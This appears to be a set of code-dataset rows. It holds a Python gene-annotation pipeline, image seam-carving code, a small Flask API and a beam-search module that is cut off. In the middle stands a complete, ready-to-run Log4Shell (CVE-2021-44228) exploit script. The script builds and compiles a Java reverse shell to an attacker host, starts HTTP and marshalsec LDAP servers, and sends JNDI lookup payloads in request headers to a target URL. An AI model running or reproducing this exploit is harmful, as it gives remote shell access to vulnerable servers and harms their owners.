print("\n\n\t\tFINAL ANNOTATED FILE: %s\n\n" % def_file)
| <filename>annotation.py<gh_stars>0
# coding=utf-8
import os
import re
import sys
import time
####### FUNCTION DEFINITIONS #######
def open_file(x): # opens a file given as an absolute or relative path
a = open(x).read().splitlines()
return a
def names(o): # returns a list containing sequences' names
s = open(o).read()
names = re.findall(">.+\n",s)
return names
def sep_seq(o): # returns a list containing 6 grouped peptid sequences by contig (its translation for each frame)
s = open(o).read()
seqs = re.split(">.+\n",s)
seqs.pop(0)
sep = [seqs[x:x+6] for x in range(0,len(seqs),6)]
return sep
def split_orfs(l): # splits ORFs for each frame translation for each contig
split = [[[] for x in range(6)] for x in range(len(l))]
for i in l:
ind = l.index(i)
indf = int((float(ind)/float(len(l)))*100)
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
if ind%3000 == 0:
print "Splitting ORFs: ", indf, "%"
for s in i:
split[l.index(i)][i.index(s)] = s.split("*")
return split
def longest_orf(l): # finds the longest ORF per frame
longest = []
for h in l:
for i in h:
if i:
longest.append(max(i,key = len))
else:
longest.append("ERROR")
ind = l.index(h)
indf = int((float(ind)/float(len(l)))*100)
if ind%3000 == 0:
print "Assigning longest ORF per frame: ", indf, "%"
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
return longest
def join(n,s): # reunites each frame's name with its longest ORF
tot = []
for i in n:
ind = n.index(i)
indf = int((float(ind)/float(len(n)))*100)
tot.append(n[ind]+s[ind])
if ind%5000 == 0:
print "Rejoining names and sequences: ", indf, "%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return tot
def annotation(ss,nn): # annotates the dataset ss with reference nn
for i in ss:
for j in nn:
if i[1] in j[0]:
i.append(j[1])
ind = ss.index(i)
indf = int((float(ind)/float(len(ss)))*100)
if ind%5000 == 0:
print "Performing annotation:", indf,"%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return ss
######## STATEMENTS ########
fasta = sys.argv[1]
ref_blat = sys.argv[2]
blat = sys.argv[3]
transeq = sys.argv[4]
merge = sys.argv[5]
print("STARTING ANNOTATION PIPELINE FOR %s" % fasta)
pep = fasta[:-6]+'_six_frames.pep'
query_blat = pep[:-4]+'_longest_clean.pep'
result_blat = query_blat[:-4]+'_vs_prot.psl'
def_file = fasta[:-6]+'_def'
sorted_file = fasta[:-6]+'_clean_sorted'
os.system(transeq+' '+fasta+' '+pep+' -frame=6') ######## the translation
print("\n\n\t\tTranslated data file: %s\n\n" % pep)
seq_names = names(pep)
sep = sep_seq(pep)
split = split_orfs(sep)
print "\n\n\t\tORF splitting done\n\n"
for i in split:
if i == [[] for x in range(6)]:
ll = [sep[split.index(i)],sep[split.index(i)+1]]
split2 = orf.split(ll)
split[split.index(i)] = split2[0]
longest = longest_orf(split) ############ longest ORF selection
print "\n\n\t\tLongest ORF selection done\n\n"
seq_clean = [re.sub('\n','',i) for i in longest]
tot = join(seq_names, seq_clean)
with open(query_blat,'a') as file:
for i in tot:
print >> file, i
print("\n\n\t\tLongest ORF per frame file: %s\n\n" % query_blat)
print "\n\n\t\tStarting BLAT\n\n"
os.system('%s -oneOff=1 -noHead -prot %s %s %s' % (blat, ref_blat, query_blat, result_blat)) ######### blat
print("\n\n\t\tBLAT done: result %s\n\n" % result_blat)
os.system('php %s %s > %s' % (merge, result_blat, result_blat+'_merge')) ######## blat correction
n1 = names(ref_blat)
n = [re.sub('\n','',i) for i in n1]
n2 = [re.sub('>','',i) for i in n]
nn = [re.split(' ',i,maxsplit = 1) for i in n2] #### prepares the reference for annotation
q = [re.split('\t',i) for i in open_file(result_blat+'_merge')]
ssa = annotation(q,nn) ##### annotation
print "\n\n\t\tANNOTATION DONE\n\n"
### arranging and sorting of annotation
ss2 = [i[:7] if len(i)>7 else i for i in ssa]
sep = [i for i in ss2 if len(i) == 7]
query_id = [i[0] for i in sep]
target_id = [i[1] for i in sep]
query_len = [i[2] for i in sep]
target_len = [i[3] for i in sep]
align_len = [i[4] for i in sep]
score = [i[5] for i in sep]
target_anot = [i[6] for i in sep]
id_2 = [i[3:] for i in target_id]
target_id = [re.sub('\|.+$','',i) for i in id_2]
target_os = [re.split('=',i[-1])[1][:-3] for i in ssa]
target_short = [re.split('=',i[-1])[0][:-3] for i in ssa]
frames = [re.findall("[\d]$",i) for i in query_id]
frames_def = [''.join(i) for i in frames]
new = [query_id[i][:-2]+'\t'+frames_def[i]+'\t'+score[i]+'\t'+target_id[i]+'\t'+target_len[i]+'\t'+target_short[i]+'\t'+target_os[i] for i in range(len(score))]
with open(fasta[:-6]+'_clean_presorted','a') as file:
for i in new:
print >> file, i
os.system('sort -k1,1 -k2,2 -k3,3 %s > %s' % (fasta[:-6]+'_clean_presorted',sorted_file))
os.system('rm %s' % fasta[:-6]+'_clean_presorted')
print("\n\n\t\tAnnotated and sorted file: %s\n\n" % sorted_file)
###
### best hit selection
neww = [re.sub('\t','',i,count = 1) for i in open_file(sorted_file)]
sepp = [re.split('\t',i) for i in neww]
for i in sepp:
i[1] = float(i[1])
i[3] = int(i[3])
lil = [[sepp[0]]]
for li in sepp[1:]:
if li[0] == lil[-1][-1][0]:
lil[-1].append(li)
else:
lil.append([li])
single = [i[-1] for i in lil]
single_sep = [[a[0][:-1],a[0][-1],a[1],a[2],a[3],a[4],a[5]] for a in single]
single_sep_unique = [[single_sep[0]]]
for li in single_sep[1:]:
if li[0] == single_sep_unique[-1][-1][0]:
single_sep_unique[-1].append(li)
else:
single_sep_unique.append([li])
single_def = []
for i in single_sep_unique:
if len(i) == 1:
single_def.append(i)
elif len(i) == 2:
if i[0][2]>i[1][2]:
single_def.append(i[0])
else:
single_def.append(i[1])
elif len(i) == 3:
if i[0][2]>i[1][2] and i[0][2]>i[2][2]:
single_def.append(i[0])
elif i[1][2]>i[0][2] and i[1][2]>i[2][2]:
single_def.append(i[1])
elif i[2][2]>i[0][2] and i[2][2]>i[1][2]:
single_def.append(i[2])
else:
print "\nTied contig: ", i, "\n"
else:
print "\nContig with more than 3 frames in blat: ", i, "\n"
single_deff = [i[0] if type(i[0]) == list else i for i in single_def]
for i in single_deff:
i[2]=str(i[2])
i[4]=str(i[4])
def_tab = ['\t'.join(i) for i in single_deff]
with open(def_file,'a') as file:
for i in def_tab:
print >> file, i
print("\n\n\t\tFINAL ANNOTATED FILE: %s\n\n" % def_file)
| en | 0.621192 | # coding=utf-8 ####### FUNCTION DEFINITIONS ####### # opens a file given as an absolute or relative path # returns a list containing sequences' names # returns a list containing 6 grouped peptid sequences by contig (its translation for each frame) # splits ORFs for each frame translation for each contig # finds the longest ORF per frame # reunites each frame's name with its longest ORF # annotates the dataset ss with reference nn ######## STATEMENTS ######## ######## the translation ############ longest ORF selection ######### blat ######## blat correction #### prepares the reference for annotation ##### annotation ### arranging and sorting of annotation ### ### best hit selection | 2.891397 | 3 |
main.py | ishan-saha/LOG4SHELL | 2 | 6616672 | <gh_stars>1-10
#!/usr/bin/env python3
import sys, os
from colorama import Fore, Back, Style
import requests
import multiprocessing
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
def shellcode(attacker , lport):
shellcode ='''import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="'''+attacker+'''";
int port='''+lport+''';
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}'''
# writing the exploit to Exploit.java file
try:
filehandler = open("Exploit.java", "w")
filehandler.write(shellcode)
filehandler.close()
a=os.system("./jdk1.8.0_181/bin/javac Exploit.java")
print(format_text("[*]" , "Exploit shellcode complete"))
except Exception as e:
print(format_text('[-] Something went wrong',e))
def web_server(WebServerPort):
with TCPServer(("0.0.0.0",int(WebServerPort)),SimpleHTTPRequestHandler) as httpd:
httpd.serve_forever()
def createLdapServer(attacker,web):
command = "jdk1.8.0_181/bin/java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://" + attacker + ":" + web +"/#Exploit"
a = os.system(command)
return a
def exploit(target,attacker):
payload = '${jndi:ldap://'+attacker+':1389/a}'
print(format_text("[!] You can use this payload for checking",payload))
header_dict = {"User-Agent":payload, "X-Api-Version":"${jndi:ldap://x${"+attacker+"}.L4J.0b34rbrwsgg7tnult6qklpxz3.canarytokens.com/a}"}
request = requests.get(target,headers=header_dict)
if request.status_code != 503:
print(format_text("[*] Request Sent",target+" - Status code recieved "+str(request.status_code)))
if __name__ == "__main__":
try:
attacker= sys.argv[1]
web = sys.argv[2]
lport = sys.argv[3]
target = sys.argv[4]
# setting up the things
shellcode(attacker, lport)
print(format_text('[+]','Setting up HTTP server'))
Childprocess0 = multiprocessing.Process(target=web_server,args=(web,))
Childprocess0.start()
print(format_text('[+]','Setting up LDAP server'))
Childprocess1 = multiprocessing.Process(target=createLdapServer, args=(attacker,web,))
Childprocess1.start()
exploit(target,attacker)
except KeyboardInterrupt:
print(format_text("Error","user interupted the program."))
sys.exit(0)
except IndexError:
print(format_text("[!] CVE-2021-44228 Exploit","Usage: main.py <AttackerIP> <WebServerPort> <LPORT> <TargetURL>"))
sys.exit(0)
except Exception as e:
print(format_text("[-]",e))
| #!/usr/bin/env python3
import sys, os
from colorama import Fore, Back, Style
import requests
import multiprocessing
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
def shellcode(attacker , lport):
shellcode ='''import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="'''+attacker+'''";
int port='''+lport+''';
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),
pe=p.getErrorStream(),
si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}'''
# writing the exploit to Exploit.java file
try:
filehandler = open("Exploit.java", "w")
filehandler.write(shellcode)
filehandler.close()
a=os.system("./jdk1.8.0_181/bin/javac Exploit.java")
print(format_text("[*]" , "Exploit shellcode complete"))
except Exception as e:
print(format_text('[-] Something went wrong',e))
def web_server(WebServerPort):
with TCPServer(("0.0.0.0",int(WebServerPort)),SimpleHTTPRequestHandler) as httpd:
httpd.serve_forever()
def createLdapServer(attacker,web):
command = "jdk1.8.0_181/bin/java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://" + attacker + ":" + web +"/#Exploit"
a = os.system(command)
return a
def exploit(target,attacker):
payload = '${jndi:ldap://'+attacker+':1389/a}'
print(format_text("[!] You can use this payload for checking",payload))
header_dict = {"User-Agent":payload, "X-Api-Version":"${jndi:ldap://x${"+attacker+"}.L4J.0b34rbrwsgg7tnult6qklpxz3.canarytokens.com/a}"}
request = requests.get(target,headers=header_dict)
if request.status_code != 503:
print(format_text("[*] Request Sent",target+" - Status code recieved "+str(request.status_code)))
if __name__ == "__main__":
try:
attacker= sys.argv[1]
web = sys.argv[2]
lport = sys.argv[3]
target = sys.argv[4]
# setting up the things
shellcode(attacker, lport)
print(format_text('[+]','Setting up HTTP server'))
Childprocess0 = multiprocessing.Process(target=web_server,args=(web,))
Childprocess0.start()
print(format_text('[+]','Setting up LDAP server'))
Childprocess1 = multiprocessing.Process(target=createLdapServer, args=(attacker,web,))
Childprocess1.start()
exploit(target,attacker)
except KeyboardInterrupt:
print(format_text("Error","user interupted the program."))
sys.exit(0)
except IndexError:
print(format_text("[!] CVE-2021-44228 Exploit","Usage: main.py <AttackerIP> <WebServerPort> <LPORT> <TargetURL>"))
sys.exit(0)
except Exception as e:
print(format_text("[-]",e)) | en | 0.281608 | #!/usr/bin/env python3 import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host=" "; int port= ; String cmd="/bin/sh"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } } # writing the exploit to Exploit.java file #Exploit" # setting up the things | 2.660842 | 3 |
shrink/seam.py | maricatovictor/smart_image_resizer | 0 | 6616673 | <gh_stars>0
import numpy as np
from shrink.energy import get_energy_fn
from numba import jit
@jit(forceobj=True)
def remove_seam(im, boolmask):
h, w = im.shape[:2]
boolmask3c = np.stack([boolmask] * 3, axis=2)
return im[boolmask3c].reshape((h, w - 1, 3))
def get_minimum_seam(im, energy="backward"):
"""
DP algorithm for finding the seam of minimum energy. Code adapted from
https://karthikkaranth.me/blog/implementing-seam-carving-with-python/
"""
h, w = im.shape[:2]
energyfn = get_energy_fn(energy)
M = energyfn(im)
backtrack = np.zeros_like(M, dtype=np.int)
M = populate_matrix(M, backtrack, h, w)
seam_idx, boolmask = find_path_backtracking(M, backtrack, h, w)
return np.array(seam_idx), boolmask
@jit
def populate_matrix(M, backtrack, h, w):
for i in range(1, h):
for j in range(0, w):
if j == 0:
idx = np.argmin(M[i - 1, j : j + 2])
backtrack[i, j] = idx + j
min_energy = M[i - 1, idx + j]
else:
idx = np.argmin(M[i - 1, j - 1 : j + 2])
backtrack[i, j] = idx + j - 1
min_energy = M[i - 1, idx + j - 1]
M[i, j] += min_energy
return M
def find_path_backtracking(M, backtrack, h, w):
seam_idx = []
boolmask = np.ones((h, w), dtype=np.bool)
j = np.argmin(M[-1])
for i in range(h - 1, -1, -1):
boolmask[i, j] = False
seam_idx.append(j)
j = backtrack[i, j]
seam_idx.reverse()
return seam_idx, boolmask
| import numpy as np
from shrink.energy import get_energy_fn
from numba import jit
@jit(forceobj=True)
def remove_seam(im, boolmask):
h, w = im.shape[:2]
boolmask3c = np.stack([boolmask] * 3, axis=2)
return im[boolmask3c].reshape((h, w - 1, 3))
def get_minimum_seam(im, energy="backward"):
"""
DP algorithm for finding the seam of minimum energy. Code adapted from
https://karthikkaranth.me/blog/implementing-seam-carving-with-python/
"""
h, w = im.shape[:2]
energyfn = get_energy_fn(energy)
M = energyfn(im)
backtrack = np.zeros_like(M, dtype=np.int)
M = populate_matrix(M, backtrack, h, w)
seam_idx, boolmask = find_path_backtracking(M, backtrack, h, w)
return np.array(seam_idx), boolmask
@jit
def populate_matrix(M, backtrack, h, w):
for i in range(1, h):
for j in range(0, w):
if j == 0:
idx = np.argmin(M[i - 1, j : j + 2])
backtrack[i, j] = idx + j
min_energy = M[i - 1, idx + j]
else:
idx = np.argmin(M[i - 1, j - 1 : j + 2])
backtrack[i, j] = idx + j - 1
min_energy = M[i - 1, idx + j - 1]
M[i, j] += min_energy
return M
def find_path_backtracking(M, backtrack, h, w):
seam_idx = []
boolmask = np.ones((h, w), dtype=np.bool)
j = np.argmin(M[-1])
for i in range(h - 1, -1, -1):
boolmask[i, j] = False
seam_idx.append(j)
j = backtrack[i, j]
seam_idx.reverse()
return seam_idx, boolmask | en | 0.851981 | DP algorithm for finding the seam of minimum energy. Code adapted from https://karthikkaranth.me/blog/implementing-seam-carving-with-python/ | 2.640777 | 3 |
HackerRank/Python/Strings/Text_Wrap.py | TISparta/competitive-programming-solutions | 1 | 6616674 | from textwrap import fill
print(fill(input(),int(input())))
| from textwrap import fill
print(fill(input(),int(input())))
| none | 1 | 2.342578 | 2 | |
server.py | VidasContadas/api-rest | 0 | 6616675 | # coding=utf-8
from flask import Flask
from pymongo import MongoClient
from bson.json_util import dumps
from settings import DATABASE, DEBUG
app = Flask(__name__)
CL = MongoClient()
@app.route("/api/v1/<collection>", methods=['GET'])
def collection_data(collection):
db = CL[DATABASE]
try:
collection = db[collection]
except Exception as e:
print(e)
raise
cursor = collection.find()
json_data = dumps([item for item in cursor])
return json_data
if __name__ == "__main__":
app.debug = DEBUG
app.run()
| # coding=utf-8
from flask import Flask
from pymongo import MongoClient
from bson.json_util import dumps
from settings import DATABASE, DEBUG
app = Flask(__name__)
CL = MongoClient()
@app.route("/api/v1/<collection>", methods=['GET'])
def collection_data(collection):
db = CL[DATABASE]
try:
collection = db[collection]
except Exception as e:
print(e)
raise
cursor = collection.find()
json_data = dumps([item for item in cursor])
return json_data
if __name__ == "__main__":
app.debug = DEBUG
app.run()
| en | 0.644078 | # coding=utf-8 | 2.62896 | 3 |
foresee/params/constants.py | HamidM6/foresee | 0 | 6616676 | <reponame>HamidM6/foresee
class Constants:
epsilon = 0.0000001 | class Constants:
epsilon = 0.0000001 | none | 1 | 1.278982 | 1 | |
code/beam.py | JiwanChung/tapm | 14 | 6616677 | <reponame>JiwanChung/tapm<gh_stars>10-100
# coding=utf-8
# Copyright (c) 2019 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
A general wrapper around models with LM heads to generate sequences
using beam search.
"""
import torch
from torch import nn
from exp import ex
from utils import chunks
class TransformerBeamSearch(nn.Module):
@ex.capture
def __init__(
self,
model,
batch_size,
num_samples,
max_target_len,
min_length=4,
alpha=0,
block_repeating_trigram=True,
):
"""
Attributes:
mask_word_id: token id that corresponds to the mask
"""
super(TransformerBeamSearch, self).__init__()
self.model = model
self.tokenizer = model.tokenizer
tokenizer = self.tokenizer
self.start_token_id = tokenizer.cls_id
self.end_token_id = tokenizer.eos_id
self.pad_token_id = tokenizer.pad_id
self.beam_size = num_samples
self.min_length = min_length
self.max_length = max_target_len
self.block_repeating_trigram = block_repeating_trigram
self.apply_length_penalty = False if alpha == 0 else True
self.alpha = alpha
def init_states(self, batch_size, device):
# State of the beam
self.hypotheses = [[] for _ in range(batch_size)]
self.batch_offset = torch.arange(batch_size, dtype=torch.long).to(device)
self.beam_offset = torch.arange(
0, batch_size * self.beam_size, step=self.beam_size, dtype=torch.long
).to(device)
self.growing_beam = torch.full(
(batch_size * self.beam_size, 1), self.start_token_id, dtype=torch.long
).to(device)
self.topk_log_probabilities = torch.tensor(
[0.0] + [float("-inf")] * (self.beam_size - 1), dtype=torch.float
).repeat(batch_size).to(device)
self.results = {
"predictions": [[] for _ in range(batch_size)],
"scores": [[] for _ in range(batch_size)],
}
self._step = 0
self.is_done = False
def step(self, log_probabilities):
""" Grows the beam by one step. """
self._step += 1
# The batch size changes as some beams finish so we define _B
vocab_size = log_probabilities.size(-1)
_B = log_probabilities.size(0) // self.beam_size
# Multiply each beam probability with the probability of the
# next token (conditioned on the words in the beam).
log_probabilities += self.topk_log_probabilities.view(-1, 1)
log_probabilities = self.enforce_min_length(log_probabilities)
if self.block_repeating_trigram:
log_probabilities = self.remove_repeating_trigrams(log_probabilities, _B)
# Find the `beam_size` (previous_beam + token) combinations with
# the highest score
topk_log_probabilities, topk_ids = torch.topk(
log_probabilities.view(_B, self.beam_size * vocab_size),
self.beam_size,
dim=1,
)
# Apply the length penalty. The +1 accounts for the [EOS] token
# that will be added if the beam ends.
topk_scores = topk_log_probabilities / self.length_penalty()
# Retrieve the corresponding respective beam and token id
# topk_token_ids[i] will be added to topk_beam_ids[i]
topk_beam_ids = topk_ids.div(vocab_size)
topk_token_ids = topk_ids.fmod(vocab_size)
# Retrieve the row index of the surviving beams in the original
# view of the log_probabilities tensor
surviving_beams_rows = (topk_beam_ids + self.beam_offset[:_B].view(-1, 1)).view(
-1
)
# Append the last predictions
self.growing_beam = torch.cat(
[
self.growing_beam.index_select(0, surviving_beams_rows),
topk_token_ids.view(-1, 1),
],
1,
)
# Check if any of the beam searches has ended during this
# growth step. Also if top beam (most probable) has ended
# for one element of the batch.
is_finished = topk_token_ids.eq(self.end_token_id)
is_finished = self.enforce_max_length(is_finished)
is_top_beam_finished = is_finished[:, 0].eq(1)
# Save the finished searches
if is_finished.any():
predictions = self.growing_beam.view(
-1, self.beam_size, self.growing_beam.size(1)
)
for i in range(is_finished.size(0)):
if is_top_beam_finished[i]:
is_finished[i].fill_(1)
finished_hyp = is_finished[i].nonzero().view(-1)
# Store finished hypotheses for this batch.
b = self.batch_offset[i]
for j in finished_hyp:
self.hypotheses[b].append((topk_scores[i, j], predictions[i, j, :]))
# If the batch reached the end, save the best hypotheses
# in terms of length-penalized score.
if is_top_beam_finished[i]:
best_hyp = sorted(
self.hypotheses[b], key=lambda x: x[0], reverse=True
)
best_score, best_prediction = best_hyp[0]
self.results["scores"][b].append(best_score)
self.results["predictions"][b].append(best_prediction)
non_finished = is_top_beam_finished.eq(0).nonzero().view(-1)
if len(non_finished) == 0:
self.is_done = True
# Remove finished batches for the next step.
topk_log_probabilities = topk_log_probabilities.index_select(
0, non_finished
)
self.batch_offset = self.batch_offset.index_select(0, non_finished)
self.growing_beam = predictions.index_select(0, non_finished).view(
-1, self.growing_beam.size(-1)
)
# surviving_beams_rows = surviving_beams_rows.index_select(0, non_finished)
return surviving_beams_rows
def tile(self, x, i):
x = x.unsqueeze(0).repeat(i, *[1 for _ in range(len(x.shape))])
x = x.view(-1, *x.shape[2:]).contiguous()
return x
def forward(self, batch, **kwargs):
# forward pass on the encoder
features, features_merged, keywords, G = self.model.prepare_group(batch)
# grow the beam by generating sequences in an autoregressive way
self.start_token_id = self.model.tokenizer.cls_id
sample_feature = features_merged[list(features.keys())[0]]
device = sample_feature.device
self.batch_size = sample_feature.shape[0]
B = self.batch_size
self.init_states(B, device)
self.growing_beam = torch.full(
(B * self.beam_size, 1), self.start_token_id, dtype=torch.long
).to(device)
for k, v in features_merged.items():
features_merged[k] = self.tile(v, self.beam_size)
keywords = self.tile(keywords, self.beam_size)
for step in range(self.max_length):
decoder_input = self.growing_beam
logit, _, _ = self.model.run_token(
decoder_input,
features_merged, keywords)
logit = logit[:, -1]
log_probabilities = torch.nn.functional.log_softmax(logit, dim=-1)
surviving_beams_rows = self.step(log_probabilities)
if self.is_done:
break
for k, v in features_merged.items():
features_merged[k] = v.index_select(0, surviving_beams_rows)
keywords = keywords.index_select(0, surviving_beams_rows)
hypo = self.results['predictions']
hypo = [self.remove_after_sep(h[0][1:]) for h in hypo] # remove sos, eos
hypo = list(chunks(hypo, 5))
return hypo
def remove_after_sep(self, x):
idx = (x == self.tokenizer.sep_id).nonzero()
if idx.nelement() > 0:
idx = idx[0].item()
return x[:idx + 1]
else:
return x
def remove_repeating_trigrams(self, log_probabilities, _B):
if(self._step + 1 > 3):
for i in range(_B * self.beam_size):
tokens = [t for t in self.growing_beam[i]]
trigrams = [(tokens[i - 1], tokens[i], tokens[i + 1]) for i in range(1, len(tokens) - 1)]
if len(trigrams) > 0:
last_trigram = tuple(trigrams[-1])
if last_trigram in trigrams[:-1]:
log_probabilities[i] = -1e20
return log_probabilities
def enforce_min_length(self, log_probabilities):
if self._step < self.min_length:
log_probabilities[:, self.end_token_id] = -1e20
return log_probabilities
def enforce_max_length(self, is_finished):
if self._step + 1 == self.max_length:
is_finished.fill_(1)
return is_finished
def length_penalty(self):
return ((5.0 + (self._step + 1)) / 6.0) ** self.alpha
def tile(x, count, dim=0):
"""
Tiles `x` along dimension `dim` `count` times.
Example:
>> ex = torch.tensor([1,2],[3,4])
>> tile(ex, 2, 0)
torch.Tensor([[1,2],[1,2],[3,4],[3,4]])
"""
perm = list(range(len(x.size())))
if dim != 0:
perm[0], perm[dim] = perm[dim], perm[0]
x = x.permute(perm).contiguous()
out_size = list(x.size())
out_size[0] *= count
batch = x.size(0)
x = (
x.view(batch, -1)
.transpose(0, 1)
.repeat(count, 1)
.transpose(0, 1)
.contiguous()
.view(*out_size)
)
if dim != 0:
x = x.permute(perm).contiguous()
return x
| # coding=utf-8
# Copyright (c) 2019 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
A general wrapper around models with LM heads to generate sequences
using beam search.
"""
import torch
from torch import nn
from exp import ex
from utils import chunks
class TransformerBeamSearch(nn.Module):
@ex.capture
def __init__(
self,
model,
batch_size,
num_samples,
max_target_len,
min_length=4,
alpha=0,
block_repeating_trigram=True,
):
"""
Attributes:
mask_word_id: token id that corresponds to the mask
"""
super(TransformerBeamSearch, self).__init__()
self.model = model
self.tokenizer = model.tokenizer
tokenizer = self.tokenizer
self.start_token_id = tokenizer.cls_id
self.end_token_id = tokenizer.eos_id
self.pad_token_id = tokenizer.pad_id
self.beam_size = num_samples
self.min_length = min_length
self.max_length = max_target_len
self.block_repeating_trigram = block_repeating_trigram
self.apply_length_penalty = False if alpha == 0 else True
self.alpha = alpha
def init_states(self, batch_size, device):
# State of the beam
self.hypotheses = [[] for _ in range(batch_size)]
self.batch_offset = torch.arange(batch_size, dtype=torch.long).to(device)
self.beam_offset = torch.arange(
0, batch_size * self.beam_size, step=self.beam_size, dtype=torch.long
).to(device)
self.growing_beam = torch.full(
(batch_size * self.beam_size, 1), self.start_token_id, dtype=torch.long
).to(device)
self.topk_log_probabilities = torch.tensor(
[0.0] + [float("-inf")] * (self.beam_size - 1), dtype=torch.float
).repeat(batch_size).to(device)
self.results = {
"predictions": [[] for _ in range(batch_size)],
"scores": [[] for _ in range(batch_size)],
}
self._step = 0
self.is_done = False
def step(self, log_probabilities):
""" Grows the beam by one step. """
self._step += 1
# The batch size changes as some beams finish so we define _B
vocab_size = log_probabilities.size(-1)
_B = log_probabilities.size(0) // self.beam_size
# Multiply each beam probability with the probability of the
# next token (conditioned on the words in the beam).
log_probabilities += self.topk_log_probabilities.view(-1, 1)
log_probabilities = self.enforce_min_length(log_probabilities)
if self.block_repeating_trigram:
log_probabilities = self.remove_repeating_trigrams(log_probabilities, _B)
# Find the `beam_size` (previous_beam + token) combinations with
# the highest score
topk_log_probabilities, topk_ids = torch.topk(
log_probabilities.view(_B, self.beam_size * vocab_size),
self.beam_size,
dim=1,
)
# Apply the length penalty. The +1 accounts for the [EOS] token
# that will be added if the beam ends.
topk_scores = topk_log_probabilities / self.length_penalty()
# Retrieve the corresponding respective beam and token id
# topk_token_ids[i] will be added to topk_beam_ids[i]
topk_beam_ids = topk_ids.div(vocab_size)
topk_token_ids = topk_ids.fmod(vocab_size)
# Retrieve the row index of the surviving beams in the original
# view of the log_probabilities tensor
surviving_beams_rows = (topk_beam_ids + self.beam_offset[:_B].view(-1, 1)).view(
-1
)
# Append the last predictions
self.growing_beam = torch.cat(
[
self.growing_beam.index_select(0, surviving_beams_rows),
topk_token_ids.view(-1, 1),
],
1,
)
# Check if any of the beam searches has ended during this
# growth step. Also if top beam (most probable) has ended
# for one element of the batch.
is_finished = topk_token_ids.eq(self.end_token_id)
